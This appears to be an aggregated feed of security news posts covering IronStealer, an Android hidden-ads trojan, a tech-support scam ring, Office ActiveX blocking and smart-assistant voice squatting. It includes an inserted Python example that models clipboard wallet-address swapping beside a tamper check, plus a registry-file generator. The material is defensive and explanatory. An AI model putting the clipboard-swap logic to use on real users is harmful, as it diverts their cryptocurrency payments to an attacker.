“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.
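An added example (not IronStealer’s code) of the clipboard substitution the researchers describe, written out so that a defender-side check can be tested against it: a few address-shaped regexes decide which currency a clipboard string looks like, the stealer’s behaviour is modelled as a same-currency swap, and the check a payment form or endpoint agent can make is that the pasted value equals the copied one. The regexes cover the common address shapes only, and every address below is a constructed placeholder, not a real wallet.

```python
import re

# One pattern per currency the page says IronStealer watches for. These capture
# the usual address shapes; the point is the swap logic, not checksum validation.
WALLET_PATTERNS = {
    "btc": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{39,59})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "xmr": re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$"),
}


def wallet_type(text):
    """Which currency, if any, a clipboard string looks like an address for."""
    text = text.strip()
    for name, rx in WALLET_PATTERNS.items():
        if rx.match(text):
            return name
    return None


# Attacker side, as the page describes it: replace with a same-currency address so
# the victim notices nothing. Constructed placeholders, not real wallets.
ATTACKER_WALLETS = {
    "btc": "1" + "B" * 33,
    "eth": "0x" + "ee" * 20,
    "xmr": "4" + "B" * 94,
}


def hijack_clipboard(clipboard_text, attacker_wallets=ATTACKER_WALLETS):
    """What the clipboard holds after one poll by the stealer: the original text, or
    the attacker's address for the same currency if the text matched a pattern."""
    kind = wallet_type(clipboard_text)
    if kind is None:
        return clipboard_text
    return attacker_wallets[kind]


def paste_is_tampered(copied, pasted):
    """Defender side: a wallet-shaped paste that differs from what the user copied is
    the signature of this family. Both values must look like addresses to count."""
    return (wallet_type(pasted) is not None
            and wallet_type(copied) is not None
            and copied.strip() != pasted.strip())


# Constructed victim addresses (placeholders).
USER_BTC = "1" + "A" * 33
USER_ETH = "0x" + "ab" * 20
USER_XMR = "4" + "A" * 94

if __name__ == "__main__":
    for copied in (USER_BTC, USER_ETH, USER_XMR, "hello world"):
        pasted = hijack_clipboard(copied)
        print(f"{wallet_type(copied)!s:5} copied={copied[:12]}... pasted={pasted[:12]}... "
              f"tampered={paste_is_tampered(copied, pasted)}")
```

The check is cheap because the swap is same-currency by design: the attacker needs the replacement to pass whatever format validation the wallet software applies, so format validation alone cannot catch it, and only comparison against what the user actually copied does.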

Further details, including the IoCs, are reported in the blog post published by the researchers.

Pierluigi Paganini

(Security Affairs – Hacking Team, Surveillance)

The post Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw appeared first on Security Affairs.

Mobile Menace Monday: A race to hidden ads

Who doesn’t love a good motorcycle racing game, right? How about one easily available on Google Play, a “safe” place for all your Android app desires? How about a bike racing game that sticks with you so much, you can’t easily uninstall it? And it displays hidden ads?

Wait, what!? That’s right! In the slideshow below, a game titled Motorcycle Race—Bike Race (package name: com.bikeme.racersm) has “rave” reviews from users demanding to know how to uninstall the game.

Rev your engines for heightened privileges

So how does one get into such a predicament? That all starts with the install process. Upon installing Motorcycle Race—Bike Race, the first screen asks to Activate device administrator.

Okay, so obviously a bike racing game requesting device administrator rights with permission to Lock the screen is a big red flag. However, if you didn’t catch that, there’s another clue that something is amiss. Look at the app name asking for permission: Media Player. That’s going to make finding the app in the device’s app list rather difficult (hint, hint).

After the initial weirdness of asking for heightened privileges, the app does open and run as advertised.

Don’t expect the game to perform well, though. It runs so slow and choppy, it makes for an unpleasant experience. This is because it’s doing something much more malicious in the background.

Over the handlebars into full screen ads

After the first time the device’s screen is locked/unlocked, it becomes clear why Lock the screen permission is requested. Behold: annoying lock screen ads that take up the whole screen!

Time to chuck this bike: how to uninstall

At this point, any user would be ready to ditch this two-wheeled game. However, if the game was given device administrator rights, this isn’t as straightforward as simply dragging the icon to uninstall. The easiest method would be to let Malwarebytes for Android, which detects this as Android/Trojan.HiddenAds.BiRa, remove the app.

However, you can also uninstall the app manually. Let’s start with dragging the icon to uninstall. That’ll bring up this warning pop-up:

Make sure to note the “Bike Racer is part of the following app: Media Player” text, as you’ll need this information later. Click OK to land here.

Next, select Manage device administrators.

Click the check mark to uncheck Media Player (which is the true name of the bike racing app). Depending on the Android OS version, this could also be an on/off toggle switch.

Here’s an extra reminder, as this is the tricky part: any time you need to uninstall an app manually, look for the app name listed after the colon in the first warning pop-up: part of the following app:<app name>. It’s easy to assume it’s listed under the app icon name (in this case Bike Racer). Registering the device administrator under a different name is a clever way to obstruct removal.

Back to uninstalling the app. After you select the check mark, you’ll get to this screen. Click “Deactivate” at the bottom of the screen.

After device administrator rights are revoked, once again drag the icon to uninstall. This time, you’ll be able to successfully remove the app.

You have the right to not give rights

Even when installing apps from reputable sources like Google Play, be careful when you grant device administrator rights. There are times when it’s appropriate to grant such rights to an app, but make sure the rights line up with the functionality of the app. Giving device administrator rights to a respectable security app in order to remediate ransomware makes sense. A bike racing game needn’t be given the same rights. Why would it need to lock your screen?

With a little scrutiny and a lot of paying attention to the fine print, you can protect yourself from malicious apps that slip by Google Play’s security parameters. Stay safe out there!

The post Mobile Menace Monday: A race to hidden ads appeared first on Malwarebytes Labs.

Security Affairs: Security Affairs newsletter Round 165 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A bug in T-Mobile site allowed anyone see any customers account details
·      Coca-Cola data breach has affected about 8,000 workers
·      Security Affairs newsletter Round 164 – News of the week
·      BackSwap Trojan implements new techniques to steal funds from your bank account
·      Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan
·      Hackers defaced screens at Mashhad airport in Iran protesting the government
·      MalHide Malware uses the compromised system as an eMail relay
·      Researchers And The FBI Work Together to Take Down the Russian VPNFilter Botnet Targeting Home Routers
·      Abusing Interactive Voice Response systems – Legacy Telecom [CVE-2018-11518]
·      EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
·      Hacker stole $1.35 million from cryptocurrency startup Taylor
·      The Cobalt Hacking crew is still active even after the arrest of its leader
·      At least 90,000 Canadian bank customers may have been affected by two data breach
·      CVE-2018-11235 flaw in Git can lead to arbitrary code execution
·      New Banking Trojan MnuBot uses SQL Server for Command and Control
·      US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra
·      Expert found a zero-day RCE in Microsoft Windows JScript component
·      Miscreants hijacked the defunct SpamCannibal blacklist service
·      US Federal court judge rejected a lawsuit by Kaspersky against the ban on its products
·      Crooks expand the original Mirai botnet code base with new capabilities and improvements
·      North Korea-linked Andariel APT Group exploited an ActiveX Zero-Day in recent attacks
·      Ticketfly website was compromised, the hacker also stole customers data
·      Visa payments DOWN: Millions affected by a service disruption
·      Yes, Germany BND foreign intelligence service can spy on the worlds biggest internet exchange
·      Crashing HDDs by launching an attack with sonic and ultrasonic signals
·      Experts believe the botmaster of the VPNFilter is attempting to resume the botnet
·      Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 165 – News of the week appeared first on Security Affairs.

McAfee Blogs: High-Tech & Hackable: How to Safeguard Your Smart Baby Devices

It’s just about as creepy as it gets: a hacker breaking into a smart device in your baby’s nursery. The Internet of Things (IoT) has wrapped our homes in technology, which means any piece of technology you own, be it a smartphone, a thermostat, or even a baby toy or monitor, is fair game for hackers.

High tech products geared toward parents of newborns and kids are on the rise. Reports show that new parents are fueling this industry and purchasing everything from smart diapers, onesies, baby monitors, digital bassinets, soothers, high-tech swings, breathing monitors, play pads, and a string of smart toys. Parents purchasing baby tech and digital toys are counting on fresh tech ideas and products to increase efficiency and maintain a constant connection to their kids.

But these seemingly efficient products, some argue, could be increasing parents’ stress in some cases. Are these tech products, which are also highly hackable, worth the risk and worry?

The Pros

Peace of mind, safety. Smart baby devices give anxious parents added peace of mind. Who doesn’t want to see their sweet baby deep in sleep and go to bed without worry? Given a chance, many parents welcome the opportunity to know their baby’s temperature, oxygen levels, heartbeat, and breathing are on track.

Remote monitoring, convenience. When you can be downstairs or working in the yard, or in your home gym, and still check on a sleeping baby, that’s an incredible convenience that many parents welcome as a productivity booster.

Learning and development. Many parents purchase smart devices for kids in an effort to help them stay on track developmentally and ensure they are prepared for the tech-driven world they are heading into.

The Cons

Hackable. Any device that is web-enabled or can connect to the cloud has the potential to be hacked, which can create a whole new set of issues for a family. If you are getting sleeping, breathing, and health data on your child, anyone else could be getting that same information.

False readings. Baby technology, as useful as it appears, can also have glitches that medical professionals argue can be more harmful than helpful. Can you imagine waking up at 2 a.m. to a monitor alarm that falsely says your baby isn’t breathing?

Complex, pricey. Some of the products can be complicated to program and set up and pricey to purchase or replace.

So why would a hacker even want to break into a baby monitor, you may ask? For some hackers, the motive is simply because they can. Being able to intercept data, crash a device, or prove his or her digital know-how is part of a hacker’s reward system. For others, the motive is far more nefarious: stalking your family’s activities or talking to your kids in the middle of the night.

Tips to safeguard baby tech:

Think before you purchase. According to the tech pros, think before buying baby tech and evaluate each item’s usefulness. Ask yourself: Do I need this piece of technology? Will this product decrease or increase my stress? If a product connects to Wi-Fi or the cloud, weigh its convenience against any risk to your family’s data.

Change default passwords. Many products come with easy-to-guess default passwords that many consumers don’t take the time to change. This habit makes it easy for hackers to break in. Hackers can also gain access to an entire Wi-Fi network just by retrieving the password stored on one device. (Sometimes all a hacker does is google a specific brand to find the product’s default password: yes, it’s as easy as that!)

Buy from known brands. Buy from reputable manufacturers and vendors. Google to see if that company’s products have ever been digitally compromised. And although it’s tempting to buy a device second-hand to save a little money, used technology might have malware installed on it, so beware.

Update software, use strong passwords. If there’s a software update alert connected to your baby tech, take the time to update immediately, and be sure to choose a password of at least 16 characters and never reuse a password across devices.

Turn off. A device that is powered off cannot be attacked over the network, so even with all the other safeguards in place, turn off devices you are not using for that last layer of protection.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post High-Tech & Hackable: How to Safeguard Your Smart Baby Devices appeared first on McAfee Blogs.



McAfee Blogs

High-Tech & Hackable: How to Safeguard Your Smart Baby Devices

It’s just about as creepy as it gets: A hacker breaking into a smart device in your baby’s nursery. The Internet of Things (IoT) has wrapped our homes technology, which means any piece of technology you own — be it a smartphone, a thermostat, or even a baby toy or monitor — is fair game for hackers.

High tech products geared toward parents of newborns and kids are on the rise. Reports show that new parents are fueling this industry and purchasing everything from smart diapers, onesies, baby monitors, digital bassinets, soothers, high-tech swings, breathing monitors, play pads, and a string of smart toys. Parents purchasing baby tech and digital toys are counting on fresh tech ideas and products to increase efficiency and maintain a constant connection to their kids.

But these seemingly efficient products, some argue, could be increasing parent’s stress in some cases. Are these tech products, which are also highly hackable, worth the risk and worry?

The Pros

Peace of mind, safety. Smart baby devices give anxious parents added peace of mind when it comes to worries. Who doesn’t want to see their sweet baby deep in sleep and go to bed without worry? Given a chance, many parents welcome the opportunity to know their baby’s temperature, oxygen levels, heartbeat, and breathing are on track.

Remote monitoring, convenience. When you can be downstairs or working in the yard, or in your home gym, and still check on a sleeping baby, that’s an incredible convenience that many parents welcome as a productivity booster.

Learning and development. Many parents purchase smart devices for kids in an effort to help them stay on track developmentally and ensure they are prepared for the tech-driven world they are heading into.

The Cons

Hackable. Any device that is web-enabled or can connect to the cloud has the potential to be hacked, which can create a whole new set of issues for a family. If you can receive your child’s sleeping, breathing, and health data remotely, anyone who compromises the device, its cloud account, or your home network can receive that same information.

False readings. Baby technology, as useful as it appears, can also have glitches that medical professionals argue can be more harmful than helpful. Can you imagine waking up at 2 a.m. to a monitor alarm that falsely says your baby isn’t breathing?

Complex, pricey. Some of the products can be complicated to program and set up and pricey to purchase or replace.

So why would a hacker even want to break into a baby monitor, you may ask? For some hackers, the motive is simply because they can. Being able to intercept data, crash a device, or prove his or her digital know-how is part of a hacker’s reward system. For others, the motives for stalking your family’s activities or talking to kids in the middle of the night can prove to be a far more nefarious activity.

Tips to safeguard baby tech:

Think before you purchase. Think before buying baby tech and evaluate each item’s usefulness. Ask yourself: Do I need this piece of technology? Will this product decrease or increase my stress? If a product connects to Wi-Fi or the cloud, weigh its convenience against the risk to your family’s data.

Change default passwords. Many products come with easy-to-guess default passwords that many consumers don’t take the time to change. This habit makes it easy for hackers to break in. Hackers can also gain access to entire wifi networks just by retrieving the password stored on one device. (Sometimes all a hacker does is google a specific brand to find the product’s password — yes, it’s as easy as that!)

Buy from known brands. Buy from reputable manufacturers and vendors. Google to see if that company’s products have ever been digitally compromised. And although it’s tempting to get your device used to save a little money, second-hand technology might have malware installed on it so beware.

Update software, use strong passwords. If there’s a software update alert for your baby tech, take the time to update immediately. Choose a password of at least 16 characters, and never reuse the same password on more than one device or account.

Turn off. A device that is powered off cannot be reached over the network, so even with all the other safeguards in place, remember to turn off devices that are not in use for that last layer of protection.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post High-Tech & Hackable: How to Safeguard Your Smart Baby Devices appeared first on McAfee Blogs.

Blocks for Flash and others coming to Office 365

If you’re a user of Microsoft Office products such as Word and Excel, you’re probably aware that they’ve been used as inroads for malware for a long, long time. But what about malware attacks without Macros? Sure. Macro malware for Macs? That, too. Malicious documents and spying tools? Danger, Will Robinson.

We have some good news and some bad news.

The good news is that monthly subscribers of Office 365 are getting some new protection in the fight against bogus attachments and malicious files; the bad news is the changes don’t currently apply to standalone versions of Office.

What’s being changed?

Silverlight, Flash, and Shockwave are all getting the chop. If you used to run a malware campaign based around use of these controls, that won’t be the case for much longer. A combination of seeing these features used in rogue campaigns, generally low legitimate use by product users (when was the last time you embedded Shockwave?), and a rapidly approaching end of the line for both Flash and Silverlight means it made a lot of sense for Microsoft to bring the hammer down.

As the Microsoft blog notes, this alteration makes no difference in situations where the control is activated outside of Office—for example, placing a Flash video into some content using the insert online video feature. Still, this is better than what’s gone before. Hopefully, Microsoft will add more protection for people not using the specified version.

Speaking of which…

Help, I’m not using the correct version!

Microsoft has you covered even if you’re not a monthly subscriber of Office 365, though you’ll have to do a bit of the shovel work yourself to shore up your defences. Roll up your sleeves, set aside a bit of spare time, and delve into this help article, which provides step-by-step instructions to lock things down. Some caveats here:

  1. You’ll have to do a spot of registry editing.
  2. Editing the registry and getting it wrong can cause all sorts of problems. Ensure you’ve made a backup before touching it. Better safe than sorry!
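The help article the post links to describes the registry change in prose. As an added example (not code from Malwarebytes or from Microsoft’s article), the following Python builds a `.reg` file you can review, back up, and import, rather than editing keys by hand. It assumes the mechanism Microsoft documents for this block: a per-control subkey under `HKEY_CURRENT_USER\Software\Microsoft\Office\Common\COM Compatibility` whose `Compatibility Flags` DWORD is set to 0x400 (“do not load”). The Flash Player control CLSID is included; the Silverlight and Shockwave CLSIDs are listed in Microsoft’s article and are passed in by the caller, so check the key path, flag value and CLSIDs against that article before importing anything.

```python
# Added example, not from the Malwarebytes post or Microsoft's article: emit a
# .reg file that tells Office not to load the given ActiveX controls, using the
# "COM Compatibility" key and the 0x400 "do not load" Compatibility Flags value
# Microsoft documents for blocking Flash, Silverlight and Shockwave in Office.
# Verify key path, value and CLSIDs against Microsoft's help article before use.

# CLSID of the Adobe Flash Player ActiveX control (ShockwaveFlash.ShockwaveFlash).
FLASH_CLSID = "{D27CDB6E-AE6D-11CF-96B8-444553540000}"

# "Do not load" bit of the Compatibility Flags DWORD (0x400 = 1024).
DO_NOT_LOAD = 0x400

KEY_BASE = r"HKEY_CURRENT_USER\Software\Microsoft\Office\Common\COM Compatibility"


def block_controls_reg(clsids, unblock=False):
    """Return the text of a .reg file that blocks (or unblocks) each CLSID.

    Unblocking is written as an explicit DWORD 0 instead of deleting the key,
    so the rollback leaves an auditable trace of what was changed."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    flag = 0 if unblock else DO_NOT_LOAD
    for clsid in clsids:
        clsid = clsid.strip().upper()
        # A CLSID is 36 hex/hyphen characters wrapped in braces: 38 in total.
        if not (clsid.startswith("{") and clsid.endswith("}") and len(clsid) == 38):
            raise ValueError(f"not a CLSID: {clsid!r}")
        lines.append(f"[{KEY_BASE}\\{clsid}]")
        lines.append(f'"Compatibility Flags"=dword:{flag:08x}')
        lines.append("")
    return "\r\n".join(lines)


def blocked_clsids(reg_text):
    """Parse a .reg produced by block_controls_reg and return the CLSIDs whose
    Compatibility Flags carry the "do not load" bit (useful for reviewing a
    file before importing it, or for diffing against an exported key)."""
    blocked, current = set(), None
    for line in reg_text.splitlines():
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].rsplit("\\", 1)[-1]
        elif line.startswith('"Compatibility Flags"=dword:') and current:
            if int(line.split("dword:")[1], 16) & DO_NOT_LOAD:
                blocked.add(current)
    return blocked


if __name__ == "__main__":
    # Writes the block for Flash only; append the Silverlight and Shockwave
    # CLSIDs from Microsoft's article to the list to block those as well.
    with open("block-office-flash.reg", "w", newline="") as fh:
        fh.write(block_controls_reg([FLASH_CLSID]))
```

Import the resulting file with `reg import block-office-flash.reg` after exporting the existing `COM Compatibility` key as a backup; running the same function with `unblock=True` produces the rollback file.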

What kind of danger are we talking?

Things like rogue embedded Flash aren’t just theoretical. It’s something we see a lot of. For example, here’s an exploit making use of rogue Excel documents targeting South Koreans via Flash.

Here’s the booby-trapped Excel sheet in action, complete with hidden ActiveX object highlighted in white:

[Screenshot: the Excel sheet with the hidden ActiveX object highlighted]

From here, it pings one of several websites with a unique identifier, the Flash version on board, and the Operating System version. If the stars align, then it’s exploit time with a side slice of Remote Administration Tool to boot.

This is a pretty sophisticated attack, but there’s plenty more out there that are as basic as they come. Either way, they get the results they need to infect an organisation.

Sounds nasty. When does the block go live?

Microsoft has said that the block rolls into place for Office 365 monthly users next month, with people using the Semi-Annual Targeted Channel and the Semi-Annual Channel receiving theirs in September 2018 and January 2019, respectively.

Of course, you can roll the blocks back yourself if you really want to (is that going to be a thing?) by following these instructions. Warning: once again, this involves some registry editing, so please make sure you’re comfortable before altering anything. Of course, if you have a monthly 365 package, it’s quite possible you’ll have an IT team performing said edits for your organisation anyway.

What else can we do to lock down Office files?

Quite a few things, actually. In more general attacks, scammers will try and convince potential victims to give Windows Admin permissions to rogue files; when that happens, it’s infection time. By the same token, they’ll try everything to convince someone to click through a bunch of “Enable Macro” prompts in an Office file. If you don’t need Macros, you should consider disabling them as soon as possible.

You can also apply a little elbow grease, and think long and hard before opening up an attachment sent your way. If you want to play it safe, always check with the sender before opening up a Word or Excel document. Don’t just stop at email confirmation; if the account has been compromised, then of course you’re going to receive a reply that says, “The attachment is definitely safe, honest.” Pick up the phone if need be. A little caution never hurt anyone, right?

For now, familiarise yourself with the upcoming changes, and have a think about whether or not you still need some of the controls penciled in for blocking. We’ll be keeping an eye out for the response to the changes, as demand for applying similar controls for other versions of Office is likely to be high. Fingers crossed, Microsoft will take heed and widen the rollout.

The post Blocks for Flash and others coming to Office 365 appeared first on Malwarebytes Labs.

FUD Crypters Recycling Old Malware

When I first started analyzing malware we stored it on floppy disks, so I know old malware when I see it. And, oddly enough, lately I’m seeing more and more of it – a phenomenon being driven, I believe, by the ongoing proliferation of FUD crypter services—FUD as in “Fully Undetectable.” I think this is evolving to the point where it will be an issue for the security industry. 


A conversation with America Geeks

Thanks to NeeP for contributing significant research. You can check out NeeP’s YouTube channel here.

Malwarebytes has written quite a bit about tech support scammers, typically focusing on new scam techniques as they arise with new threat actor groups. But sometimes our research discovers scammers who persist with the same techniques, the same pitches, and the same IP abuse, no matter how many times we catch them.

We first published on America Geeks (then known as Geeks Technical Support) in 2015, noting their attempts to use Malwarebytes’ intellectual property to pose as us and defraud their customers. After a series of takedowns and abuse complaints, we revisited America Geeks in 2016—still using Malwarebytes image assets, still scamming.

And lastly, in March, Malwarebytes Labs researchers found them again using Malwarebytes to sell their scam, this time targeting French users. We were content to continue publishing on America Geeks indefinitely, but then they decided to open a ticket with the Malwarebytes help desk.

In further social media comments that have since been deleted, the person who opened the ticket identified as being associated with America Geeks, and was quite concerned about our 2016 post on the company. We did not follow up.

On May 1, our customer support team got a phone call from “Kevin Nash” at the “Better Business Bureau” who informed us that America Geeks was no more, and our 2016 blog post was causing problems for someone who had bought their infrastructure. (At the time, their website was still up and not at all defunct.)

Why the Better Business Bureau would serve as an intermediary between a defunct business’ CEO in one country and a tech company in another was left unexplained. Why “Kevin Nash” had an Indian cell phone number and a heavy Indian accent was left unexplained. We did not follow up.

He provided contact details that we have redacted.

“Kevin Nash” then contacted us as the personal attorney of the former America Geeks CEO. He alleged that Kunal Bansal of America Geeks was at risk of physical harm from our 2016 blog post, and needed us to take it down. Further, America Geeks was shut down, and therefore no longer a threat to anyone. Given the seriousness of the claims, we followed up. Here’s the transcript for three calls conducted with Kevin Nash:

Call one

America Geeks (AG): Hey, this is Kevin. How you doing buddy?

Malwarebytes (MWB): Oh, is this Kevin…Kevin Nash?

AG: Kevin Nash.

MWB: Okay, I’m sorry. Are you calling—are you from the Better Business Bureau? ’Cause I think that’s what the message I had gotten said.

AG: Uh…no…no no. I’m not from Better Business Bureau, I’m with the legal team with the company that the review is about.

MWB: You’re with the legal team? What company is it? Geek? Geeks? Is it…

AG: Yeah. Okay, so the thing is, that Geeks company is closed. Alright?

MWB: Okay.

AG: That geek company is closed. That business doesn’t exist anymore, and no business associated with that article that is, uh, open. Like we have closed that business. My…self called BBB because my friend works there. It could be that he called because I interested him to. And that probably…

MWB: Okay. Who am I speaking with? Is this Kevin Nash?

AG: Yeah, that’s right. My client owns this company, and uh…that company doesn’t exist anymore. So, uh…his personal information is there on that post. And uh, he got critically attacked by someone as well, due to the, you know, the information there on the post. People got to know about him, knows his business, everything related to that business, now he is, uh, concerned regarding his privacy, you know?

MWB: And What is your client’s name?

AG: Kunal Bansal.

MWB: Okay, um, I’m a little confused. If the company is closed, then what—were you planning on reopening the company? Is that why you want to get rid of the post?

AG: No. The problems of getting that post removed is that his personal details are mentioned on that post. Even the photo is there on the post.

MWB: Okay, I’ll tell you what. If you can send me, send me all the information in the email, and what it is you want us to do, I’ll see what I can do for you. Do you have a phone that doesn’t go to voicemail? You’re a lawyer? And in what state are you practicing?

AG: I’m in California. Marina Del Ray?

MWB: Can you send me the information of your law firm? And um, all the information of the client, and I’ll get back to you as soon as I get that information.

AG: Thank you so much.

MWB: Thank you.

Call two

AG: [Inaudible] This is Kevin Nash.

MWB: Hey yeah, I can hear you. You’re the lawyer for Mr. Bansal?

AG: Kunal Bansal. Yeah, that’s right.

MWB: Okay, what’s the name of your law firm again?

AG: USA Legal Services

MWB: US?

AG: It’s USA Legal Services

MWB: Okay and you’re out of, uh, California?

AG: Yep.

MWB: Do you have an address there in California?

AG: That would be [REDACTED]

MWB: Do you have an office number?

AG: Yes, I have office number, and this is my office number.

MWB: Your office number is the 323?

AG: Yeah thats my personal, direct line in office.

MWB: Has [Kunal Bansal] made any restitution? On the people that he scammed?

[America Geeks hangs up.]

Call three

AG: Yeah, I’m so sorry, I don’t, the line got blank.

MWB: Well, that’s okay. Okay, so was there any restitution made on behalf of your client?

AG: Well, uh, I’ll need to check once with the department there, and I’ll get back to you, certainly. And I’ll have something emailed to you, within minutes. Alright? [NOTE: Mr. Nash never provided any evidence of restitution, or any explanation of whom he was checking with if the company was shut down.]

MWB: Okay. Uh, one other question. Okay, so the address you gave me, [REDACTED]. I can’t find a USA Legal Services at that address. Is that the correct address?

AG: That should be [REDACTED SECOND ADDRESS]

MWB: Oh now it’s [REDACTED]?

AG: Talking to me like I’m some criminal or something…

MWB: Listen—I deal with complaints and I’m trying to clarify who you are. I mean, I get a phone call. First of all, the phone call stated that you are Kevin Nash from Better Business Bureau. Now when I call you back you’re Kevin Nash. . .and you’re the lawyer, and then you’re giving me the address for a law firm that doesn’t exist.

AG: [Silence.]

MWB: So yes, I have some reservations that I’m not dealing with a legitimate person. Your emails are coming from a different person altogether. They’re not coming from a law office. They’re coming from “Naresh Kumar.”

AG: I got you, I got you. I have a, let me, let me send you an email.

MWB: Can you explain to me why that I’m getting emails from Naresh Kumar, and you’re saying you’re Kevin Nash?  And you’re a lawyer?

AG: [pause] That’s right. He’s the person who’s dealing with me through Mr. Kunal Bansal. And the reason why you’re not getting any email from my address is because I was having him do that. Now I do have access to my email and if you’ll give me like two minutes, then…restitution is what you’re asking for? I’ll send it to you through my official email wherein I will have my company phone number, as well as my number, as well as company [inaudible]

MWB: What’s your company phone number?

AG: That will be 844-676-LOAN. L-O-A-N. [NOTE: Searches on this number returned hits for mortgage loans and student debt consolidation. We did not redact the number because we believe it to be associated with multiple fraudulent businesses. All websites with this number are now down.]

[Crosstalk]

AG: There’s an alternate too, it’s [REDACTED.]  Law.

MWB: Okay, well, if you can send me the information, Mr. Nash?

AG: I’ll send it to you from a [inaudible] email address this time, alright?

MWB: Okay. Alright, I’ll be waiting for your email address.

Digging into America Geeks ops

After speaking with Mr. Nash, we decided to take a look at how extensive America Geeks operations really were. First and foremost, he provided an Indian cell phone number that popped in Google Cache as a corporate contact on the site https://shopping4kart[.]com.

Passive DNS for that site revealed extensive infrastructure that is very likely used for tech support scams.

A survey of historical victim reports using overlapping phone numbers revealed the following business names:

  • America Geeks
  • Geeks Technical Support
  • Mark Software Private Limited, USA
  • Technology LLC
  • Blue Alpha
  • IT Pvt Ltd
  • USA Legal Services LLC

Independent researchers provided us with the following list of phone numbers used by the threat actor group:

  • 18776589988
  • 18776941838
  • 18882466988
  • 18883502808
  • 18884273330
  • 18884898307
  • 18885882055
  • 18886100490
  • 18886608571
  • 18887590763
  • 18887789143
  • 18887799348
  • 18889127011
  • 18889597430
  • 18776941838
  • 18558870097
  • 18446709167
  • 18886100490
  • 18445714235
  • 18887549063
  • 18889597430
  • 18887789193
  • 18552174635
  • 18882955166
  • 18882954668

[NOTE: Numbers are provided for historical purposes only. Scammers change numbers frequently.]

The America Geeks website was in fact down at the time of Mr. Nash’s phone call. But scammers frequently maintain extensive domain holdings so they can shift operations when one domain receives too much attention. America Geeks makes frequent use of browser lock screens, but also has a fair number of fake corporate sites to attract organic traffic. The domains used over their lifespan include, but are not limited to:

  • https://www.usatechnologyllc.com
  • http://www.usalegalservices.com
  • https://www.marksoftwaresystems.com
  • https://www.geekstechnicalsolutions.com
  • www.geekshelp123.me
  • www.geekshelp1.me
  • www.itechwyre.com
  • http://www.geeksupport123.me
  • http://geeksworld.co/geeks-support-for-epson.php
  • www.americageeks.com
  • www.geekamericas.com
  • www.americageekpayment.com
  • www.americageekssurvey.com
  • www.geekshelp.me
  • https://engenius-tech-support.com
  • www.geeksoftwareexperts.com
  • www.usatechsupportltd.com
  • www.rarebitlogistics.com
  • https://geeksfrance.com
  • https://officeactivation.net
  • www.itechhelpsupport.com
  • https://printer-tech-support-help.com
  • https://kaspersky-customer-care.com
  • https://comodo-support-help.com
  • https://lexmark-support-help-247.com
  • https://best-buy-phone-number.com

[NOTE: A number of these domains are historical, and may be down or transferred to a legitimate owner since publication.]

Concluding a review of their historical infrastructure, we found tech support scam complaints relating to Kunal Bansal–related properties dating back to 2012. Although America Geeks’ website is down at the time of writing, we find it unlikely that their scamming has ceased entirely. Instead, it has most likely shifted to a new company name. Given that they had resources sufficient to target users in multiple countries, in their own language, America Geeks appears to have been extremely profitable, and we advise users to be wary of any new company name used by the America Geeks proprietors.

For more on tech support scams and how to stay safe, see the following blog, or check out our forums to report new scam sites and numbers.

The post A conversation with America Geeks appeared first on Malwarebytes Labs.

Researchers discover vulnerabilities in smart assistants’ voice commands

Virtual personal assistants (VPA), also known as smart assistants, like Amazon’s Alexa and Google’s Assistant are in the spotlight for their vulnerability to attack. Take, for example, the incident in which an Oregon couple’s Echo smart speaker inadvertently recorded their conversation and sent it to a random contact. Or the time Alexa started laughing out of the blue. Whether such incidents are accidental or the result of deliberate abuse, something has to be done about them.

Earlier this month, researchers from Indiana University, the Chinese Academy of Sciences, and the University of Virginia found exploitable weaknesses in the VPAs above. Researchers dubbed the techniques they used to reveal these weaknesses as voice squatting and voice masquerading. Both take advantage of the way smart assistants process voice commands. Unsurprisingly, these also exploit users’ misconceptions about how such devices work.

How smart assistants work

VPA services used in smart speakers do what they’re created to do through apps called “skills” (by Amazon) or “actions” (by Google). A skill or an action gives a VPA additional features. Users interact with a smart assistant through a voice user interface (VUI), which lets them run a skill or action using only their voice.

Entrepreneurs, with the help of developers, are already taking advantage of creating their own voice assistant (VA) apps to cater to client needs, making their services accessible in the voice platform, or merely introducing an enjoyable experience to users.

As of this writing, the smart assistant app market is booming. Alexa alone already has tens of thousands of skills, thanks to the Alexa Skills Kit. Furthermore, Amazon has recently released Alexa Skill Blueprints, which makes creating a skill easy for someone with little to no knowledge of coding.

Unfortunately, the availability of such a kit to the public has made abuse by potential threat actors possible, making the VPA realm an entirely new attack vector. If an attack is successful—and the study researchers conducted proved that it can be—a significant number of users could be affected. They concluded that remote, large-scale attacks are “indeed realistic.”

Squatters and masqueraders

Voice squatting is a method wherein a threat actor abuses the way a skill or action is invoked. Let’s take an example from the researchers’ white paper. If a user says, “Alexa, open Capital One” to run the Capital One skill, a threat actor can potentially create a malicious app with a similarly pronounced name, such as Capital Won. The command meant for the Capital One skill is then hijacked to run the malicious Capital Won skill instead. Also, as Amazon is now rewarding kids for saying “please” when commanding Alexa, a similar hijacking can occur if a threat actor registers a paraphrased name like Capital One please or Capital One Police.

“Please” and “police” may mean two totally different things to us, but for current smart assistants, these words are the same, as they cannot correctly recognize one invocation name over another similar-sounding one.

Suffice to say, VPAs are not great at handling homophones.
